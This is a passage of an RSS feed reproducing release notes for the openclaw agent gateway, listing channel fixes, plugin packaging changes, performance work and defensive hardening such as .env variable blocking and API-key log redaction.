<li>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</li>
<li>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</li>
<li>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</li>
<li>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</li>
<li>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</li>
<li>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</li>
<li>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</li>
<li>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</li>
<li>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</li>
<li>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</li>
<li>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</li>
<li>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</li>
<li>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</li>
<li>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</li>
<li>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</li>
<li>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</li>
<li>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</li>
<li>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</li>
<li>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</li>
<li>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</li>
<li>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</li>
<li>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2-beta.3]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks @vincentkoc.
Gateway startup, session listing, task maintenanc...]]></description>
<link>https://tsecurity.de/de/3482880/downloads/openclaw-202652-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482880/downloads/openclaw-202652-beta3/</guid>
<pubDate>Sun, 03 May 2026 00:16:39 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway startup, session listing, task maintenance, prompt prep, plugin loading, and filesystem hot paths get targeted cache and fanout reductions for large or plugin-heavy installs.</li>
<li>Control UI and WebChat reliability improves across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Channel and provider fixes cover Telegram topic commands and networking, Discord delivery and startup edge cases, OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, Brave/SearXNG/Firecrawl web search, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>
<p>Gateway/startup: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</p>
</li>
<li>
<p>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</p>
</li>
<li>
<p>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params so stable embedded-run inputs no longer repeat plugin registry resolution while model-specific transport hook patches stay isolated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/runtime: memoize transcript replay-policy resolution for stable config and process-env runs while preserving custom-env provider hook behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</p>
</li>
<li>
<p>Tools: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize ACPX behind the official <code>@openclaw/acpx</code> package so packaged installs keep ACP harness adapter binaries out of core until the ACP backend is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize diagnostics OpenTelemetry behind the official <code>@openclaw/diagnostics-otel</code> package so packaged installs keep the OTEL dependency stack out of core until the plugin is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Google Chat, LINE, Matrix, and Mattermost for <code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, and Zalo Personal for <code>2026.5.1-beta.2</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, and WhatsApp for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</p>
</li>
<li>
<p>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, and add <code>googlemeet end-active-conference</code> for closing managed spaces after a call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a>.</p>
</li>
<li>
<p>Google Meet: add <code>googlemeet test-listen</code> and the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verifying the ClawPack response header and downloaded bytes before installing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: persist ClawPack digest metadata on ClawHub plugin install and update records so registry refreshes and download verification can reuse stored artifact facts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: allow install-on-demand provider setup entries to persist ClawHub artifact metadata after explicit ClawHub installs while retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</p>
</li>
<li>
<p>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</p>
</li>
<li>
<p>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</p>
</li>
<li>
<p>Dependencies: refresh workspace dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, and Marked 18.0.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</p>
</li>
<li>
